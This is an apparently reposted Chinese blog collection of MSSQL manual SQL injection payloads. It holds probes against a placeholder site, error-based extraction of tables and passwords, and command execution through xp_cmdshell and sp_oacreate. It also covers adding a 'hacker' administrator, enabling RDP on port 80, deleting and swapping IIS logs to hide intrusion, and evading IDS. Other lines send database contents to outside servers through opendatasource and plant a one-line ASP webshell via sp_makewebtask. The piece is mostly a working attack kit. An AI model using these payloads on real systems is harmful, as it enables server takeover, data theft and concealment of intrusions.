zoukankan      html  css  js  c++  java

  • (转收集)MSSQL手工注入语句集合

    and exists (select * from sysobjects) //判断是否是MSSQL

    and exists(select * from tableName) //判断某表是否存在..tableName为表名

    and 1=(select @@VERSION) //MSSQL版本

    And 1=(select db_name()) //当前数据库名

    and 1=(select @@servername) //本地服务名

    and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员

    and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限

    and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限

    and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1,2,3....

    ;declare @d int //是否支持多行

    and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在

    and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除

    添加和删除一个SA权限的用户test:(需要SA权限)

    exec master.dbo.sp_addlogin test,password

    exec master.dbo.sp_addsrvrolemember test,sysadmin

    停掉或激活某个服务。 (需要SA权限)

    exec master..xp_servicecontrol 'stop','schedule'

    exec master..xp_servicecontrol 'start','schedule'

    暴网站目录

    create table labeng(lala nvarchar(255), id int)

    DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into labeng(lala) values(@result);

    and 1=(select top 1 lala from labeng) 或者and 1=(select count(*) from labeng where lala>1)

    —————————————————————————————————————————————————————

    DOS下开3389 并修改端口号

    sc config termservice start= auto

    net start termservice

    //允许外连

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f

    //该3389端口到80

    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f

    SQL Server

    判断是否可注射:

    http://www.targer.com/article.asp?id=6

    http://www.targer.com/article.asp?id=6'

    http://www.targer.com/article.asp?id=6 and 1=1

    http://www.targer.com/article.asp?id=6 and 1=2

    http://www.targer.com/article.asp?action=value' and 1=1

    http://www.targer.com/article.asp?action=value' and 1=2

    searchpoints%' and 1=1

    searchpoints%' and 1=2

    确定数据库类型:

    http://www.targer.com/article.asp?id=6 and user>0

    http://www.targer.com/article.asp?id=6 and (select count(*) from sysobjects)>0

    查询当前用户数据信息:

    article.asp?id=6 having 1=1--

    暴当前表中的列:

    article.asp?id=6 group by admin.username having 1=1--

    article.asp?id=6 group by admin.username,admin.password having 1=1--

    暴任意表和列:

    and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1

    and (select top col_name(object_id('admin'),N) from sysobjects)>1

    暴数据库数据:

    and (select top 1 password from admin where id=N)>1

    修改数据库中的数据:

    ;update admin set password='oooooo' where username='xxx'

    增添数据库中的数据:

    ;insert into admin values (xxx,oooooo)--

    删数据库:

    ;drop database webdata

    获取当前数据库用户名:and user>0

    获取当前数据库名:and db_name()>0

    获取数据库版本:and (select @@version)>0

    判断是否支持多句查询:;declare @a int--

    判断是否支持子查询:and (select count(1) from [sysobjects])>=0

    数据库的扩展存储过程:exec master..xp_cmdshell

    查看服务器C盘目录:;exec_master..xp_cmdshell 'dir c:\'

    判断扩展存储过程是否存在:and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

    恢复扩展存储过程:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

    删除扩展存储过程:;exec sp_dropextendedproc 'xp_cmdshell'

    在MSSQL2000中提供了一些函数用于访问OLE对象间接获取权限:

    ;declare @s int

    ;exec sp_oacreat 'wscript.shell',@s

    ;exec master..spoamethod @s,'run',null,'cmd.exe/c dir c:\'

    判断当前数据库用户名是否拥有比较高的权限:

    and 1=(select is_srvrolemember('sysadmin'))

    and 1=(select is_srvrolemember('serveradmin'))

    and 1=(select is_srvrolemember('setupadmin'))

    and 1=(select is_srvrolemember('securityadmin'))

    and 1=(select is_srvrolemember('diskadmin'))

    and 1=(select is_srvrolemember('bulkadmin'))

    判断当前数据库用户名是否为DB_OWNER:

    and 1=(select is_member('db_owner'))

    在SQLSERVER的master.dbo.sysdatabases表中存放着SQLSERVER数据库系统中的所有数据库信息,只需要PUBLIC权限就可以对此表进行SELECT操作:

    and (select top 1 name from master.dbo.sysdatabase order by dbid)>0

    and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0

    删除日志记录:

    ;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt'

    替换日志记录:

    ;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5\ex070404.log c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt'

    获取WEB路径:

    ;declare @shell int

    ;exec master..sp_oamethod 'wscript.shell',@shell out

    ;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /s d:/index.asp >c:/log.txt

    利用XP_CMDSHELL搜索:

    ;exec master..xp_cmdshell 'dir /s d:/index.asp'

    显示服务器网站配置信息命令:

    cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/1/root

    cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root

    利用XP_REGREAD可用PUBLIC权限读取:

    ;exec master.dbo.xp_regread

    hkey_local_machine,

    'system\currentcontrolset\services\w3svc\parameters\virtual roots\'

    '/'

    SQLSERVER下的高级技术可以参考阅读曾云好所著的精通脚本黑客第五章。

    3、DSqlHelper

    检测权限SYSADMIN:

    and 1=(select IS_SRVROLEMEMBER('sysadmin'))

    serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin、db_owner。

    检测XP_CMDSHELL(CMD命令):

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_cmdshell')

    检测XP_REGREAD(注册表读取功能):

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread')

    检测SP_MAKEWEBTASK(备份功能):

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask')

    检测SP_ADDEXTENDEDPROC:

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc')

    检测XP_SUBDIRS读子目录:

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs')

    检测XP_DIRTREE读子目录:

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree')

    修改内容:

    ; UPDATE 表名 set 字段=内容 where 1=1

    XP_CMDSHELL检测:

    ;exec master..xp_cmdshell 'dir c:\'

    修复XP_CMDSHELL:

    ;exec master.dbo.sp_addextendedproc 'xp_cmdshell', 'xplog70.dll'

    用XP_CMDSHELL添加用户hacker:

    ;exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

    XP_CMDSHELL把用户hacker加到ADMIN组:

    ;exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'

    创建表test:

    ;create table [dbo].[test] ([dstr][char](255));

    检测表段test:

    and exists (select * from test)

    读取WEB的位置(读注册表):

    ;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/',@result output insert into test (dstr) values(@result);--

    爆出WEB的绝对路径(显错模式):

    and 1=(select count(*) from test where dstr > 1)

    删除表test:

    ;drop table test;--

    创建查看目录的表dirs:

    ;create table dirs(paths varchar(100), id int)

    把查看目录的内容加入表dirs:

    ;insert dirs exec master.dbo.xp_dirtree 'c:\'

    爆目录的内容dirs:

    and 0<>(select top 1 paths from dirs)

    备份数据库DATANAME:

    declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak';--

    删除表dirs:

    ;drop table dirs;--

    创建表temp:

    ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

    把驱动盘列表加入temp表:

    ;insert temp exec master.dbo.xp_availablemedia;--

    删除表temp:

    ;delete from temp;--

    创建表dirs:

    ;create table dirs(paths varchar(100), id int);--

    获得子目录列表XP_SUBDIRS:

    ;insert dirs exec master.dbo.xp_subdirs 'c:\';--

    爆出内容(显错模式):

    and 0<>(select top 1 paths from dirs)

    删除表dirs:

    ;delete from dirs;--

    创建表dirs:

    ;create table dirs(paths varchar(100), id int)--

    用XP_CMDSHELL查看目录内容:

    ;insert dirs exec master..xp_cmdshell 'dir c:\'

    删除表dirs:

    ;delete from dirs;--

    检测SP_OAcreate(执行命令):

    and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'SP_OAcreate')

    SP_OAcreate执行CMD命令:

    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c net user hacker 123456 /add'

    SP_OAcreate建目录:

    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\windows\system32\cmd.exe /c md E:\XkCmsV\webForm\1111'

    创建一个虚拟目录E盘:

    ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub \wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"'

    设置虚拟目录E为可读:

    ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'

    启动SERVER服务:

    ;exec master..xp_servicecontrol 'start', 'server'

    绕过IDS检测XP_CMDSHELL:

    ;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'

    开启远程数据库1:

    ; select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

    开启远程数据库2:

    ;select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table'

    //看看是什么权限的

    and 1=(Select IS_MEMBER('db_owner'))

    And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

    //检测是否有读取某数据库的权限

    and 1= (Select HAS_DBACCESS('master'))

    And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

    数字类型

    and char(124)%2Buser%2Bchar(124)=0

    字符类型

    ' and char(124)%2Buser%2Bchar(124)=0 and ''='

    搜索类型

    ' and char(124)%2Buser%2Bchar(124)=0 and '%'='

    爆用户名

    and user>0

    ' and user>0 and ''='

    检测是否为SA权限

    and 1=(select IS_SRVROLEMEMBER('sysadmin'));--

    And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

    检测是不是MSSQL数据库

    and exists (select * from sysobjects);--

    检测是否支持多行

    ;declare @d int;--

    恢复 xp_cmdshell

    ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

    select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

    //-----------------------

    //      执行命令

    //-----------------------

    首先开启沙盘模式:

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

    然后利用jet.oledb执行系统命令

    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

    执行命令

    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

    EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

    判断xp_cmdshell扩展存储过程是否存在:

    http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

    写注册表

    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

    REG_SZ

    读注册表

    exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

    读取目录内容

    exec master..xp_dirtree 'c:\winnt\system32\',1,1

    数据库备份

    backup database pubs to disk = 'c:\123.bak'

    //爆出长度

    And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

    更改sa口令方法:用sql综合利用工具连接后,执行命令:

    exec sp_password NULL,'新密码','sa'

    添加和删除一个SA权限的用户test:

    exec master.dbo.sp_addlogin test,ptlove

    exec master.dbo.sp_addsrvrolemember test,sysadmin

    删除扩展存储过过程xp_cmdshell的语句: 

    exec sp_dropextendedproc 'xp_cmdshell'

    添加扩展存储过过程

    EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' 

    GRANT exec On xp_proxiedadata TO public

    停掉或激活某个服务。

    exec master..xp_servicecontrol 'stop','schedule'

    exec master..xp_servicecontrol 'start','schedule'

    dbo.xp_subdirs

    只列某个目录下的子目录。

    xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

    dbo.xp_makecab

    将目标多个档案压缩到某个目标档案之内。

    所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。

    dbo.xp_makecab

    'c:\test.cab','mszip',1,

    'C:\Inetpub\wwwroot\SQLInject\login.asp',

    'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

    xp_terminate_process

    停掉某个执行中的程序,但赋予的参数是 Process ID。

    利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID

    xp_terminate_process 2484

    xp_unpackcab

    解开压缩档。

    xp_unpackcab 'c:\test.cab','c:\temp',1

    某 机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用 regedit /e 导入注册文件,但是mssql是sa权限,使用如下命 令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0 \Server \Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即 可修改密码为12345678。如果要修改端口 值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0 \Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

    create database lcx;

    Create TABLE ku(name nvarchar(256) null);

    Create TABLE biao(id int NULL,name nvarchar(256) null);

    //得到数据库名

    insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

    //在Master中创建表,看看权限怎样

    Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

    用 sp_makewebtask直接在web目录里写入一句话马:

    http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

    //更新表内容

    Update films SET kind = 'Dramatic' Where id = 123

    //删除内容

    delete from table_name where Stockid = 3
  • 相关阅读:
    OTG线与普通USB线的区别
    打开CMDLINE中的 ” earlyprink “ 参数
    深化管理、提升IT的数据平台建设方案
    ROS(indigo)ROSPlan框架
    ROS(indigo)RRT路径规划
    Unity UGUI图文混排(六) -- 超链接
    ROSCon 2016视频和幻灯片发布 ROS机器人操作系统重要参考资料
    Ubuntu和ROS一起愉快玩耍
    IO流—字符流
    IO流——字节流
  • 原文地址:https://www.cnblogs.com/beyond1983/p/3023707.html
Copyright © 2011-2022 走看看